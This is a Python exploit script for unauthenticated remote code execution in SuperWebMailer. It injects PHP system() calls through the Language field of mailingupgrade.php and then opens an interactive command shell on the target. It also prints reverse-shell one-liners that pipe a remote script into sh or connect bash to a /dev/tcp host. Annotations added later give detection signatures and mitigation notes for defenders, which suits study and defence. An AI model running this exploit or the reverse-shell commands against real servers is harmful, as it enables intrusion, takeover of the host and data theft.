exploit.py
import requests
import sys
import urllib.parse
import argparse
# One shared HTTP session carries every request this script sends.
req = requests.Session()
# Only the content type is overridden (the form bodies are hand-built and
# already URL-encoded), so the library's default User-Agent is what shows up
# in the target's access logs.
headers = {"Content-type": "application/x-www-form-urlencoded"}
def check(target):
    """Probe *target* and, if the probe succeeds, start a command loop.

    The probe posts a form body to ``/mailingupgrade.php`` whose ``Language``
    field decodes to ``de{${system("echo asu")}}``.  The target is reported
    as vulnerable only when the reply is HTTP 200 and contains the marker
    ``asu``.

    Defender notes:
      * No credentials or cookies are sent (the banner calls the issue
        unauthenticated), so whether the upgrade script is reachable at all
        is the first thing to check.
      * Detection: POSTs to ``/mailingupgrade.php`` with ``step=4`` and a
        ``Language`` value containing ``{${`` or ``system(``.  A legitimate
        value is presumably a short language code -- confirm against the
        product.
      * After a successful probe the script immediately runs ``uname -a``
        and ``id``; those processes spawned by the web server / PHP worker
        are a host-side indicator.
      * Mitigation: remove or block the upgrade script where it is not
        needed and apply the vendor's fix (no version is named on this page).

    NOTE(review): the listing lost its indentation; the nesting below is
    reconstructed from the control flow.
    """
    print("[DEBUG] Sending Payload To the Target...")
    probe_body = r"step=4&Language=de%7b$%7bsystem(%22echo asu%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
    url = "{}/mailingupgrade.php".format(target)
    resp = req.post(url, data=probe_body, headers=headers)

    # Guard clause: anything other than "marker echoed back with HTTP 200"
    # is reported as not vulnerable and nothing further is sent.
    if "asu" not in resp.text or resp.status_code != 200:
        print("\033[91m[ERR] ANJG ENGGAK VULN :')")
        return

    print("[OK] The target is vulnerable")
    print('''
+-----------[Reverse Shell Cheatsheet]-----------+
| > curl https://shell.now.sh/urip:port | sh |
| > bash -i >& /dev/tcp/urip/port 0>&1 |
+------------------------------------------------+
''')
    # Two fixed commands are always sent first, then whatever the operator types.
    exploit(target, "uname -a")
    exploit(target, "id")
    while True:
        line = input("Shell Command> ")
        if line == "exit":
            sys.exit()
        exploit(target, line)
        print('type "exit" to exit')
def exploit(target, command):
    """Send *command* through the ``Language`` form field and print the reply.

    The command is percent-encoded and placed between the same fixed prefix
    and suffix that the probe in ``check`` uses, then posted to
    ``/mailingupgrade.php``.

    Defender notes:
      * Every request carries the constant values
        ``RegName=12345678901234567890123`` and ``RegNumber=12345``, which
        makes a stable signature for WAF rules or log searches.
      * The reply contains the server message "Can't load correct language
        file in /language directory", which is stripped before printing;
        if the application logs that message, it is another place to look.
    """
    quoted = urllib.parse.quote(command)
    prefix = r"step=4&Language=de%7b$%7bsystem(%22"
    suffix = r"%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
    resp = req.post(
        "{}/mailingupgrade.php".format(target),
        data=prefix + quoted + suffix,
        headers=headers,
    )
    # Drop the server's own error line so only the command output is shown.
    noise = "Can't load correct language file in /language directory"
    print(resp.text.replace(noise, ""))
def main():
    """Print the banner, read the ``-u`` target URL and pass it to ``check``.

    With no command-line arguments the help text is printed and the process
    exits before any request is sent.

    Defender note: the URL is used verbatim as a prefix for
    ``/mailingupgrade.php``, so a target given with a trailing slash (as in
    the help example) may appear in access logs as ``//mailingupgrade.php``.
    """
    # The banner is a non-raw string: a backslash at the end of an art line
    # acts as a line continuation, so those lines are joined when printed.
    banner = '''
\033[94mUnauth SuperWebMailer RCE Exploit by
|\___/|
) (
=\ /=
) (
/ \
| |
/ \
\ /
\__ _/
( (
) )
(_(
\033[92m 𝓓 卂尺Ҝ 匚ㄥㄖ山几 丂乇匚ㄩ尺丨ㄒㄚ
\033[91m Autho : Mr.TenAr and ./Sandal.py
'''
    print(banner)

    cli = argparse.ArgumentParser(description='\033[96mHelp..', add_help=True)
    cli.add_argument(
        '-u',
        action="store",
        dest="target",
        help='target url ex. http://target.com/',
    )
    opts = cli.parse_args()

    # Checked after parsing, as in the original: a bare invocation shows help.
    if len(sys.argv) == 1:
        cli.print_help()
        sys.exit()

    check(opts.target)
# Run the command-line flow only when executed as a script, not on import.
if __name__ == '__main__':
    main()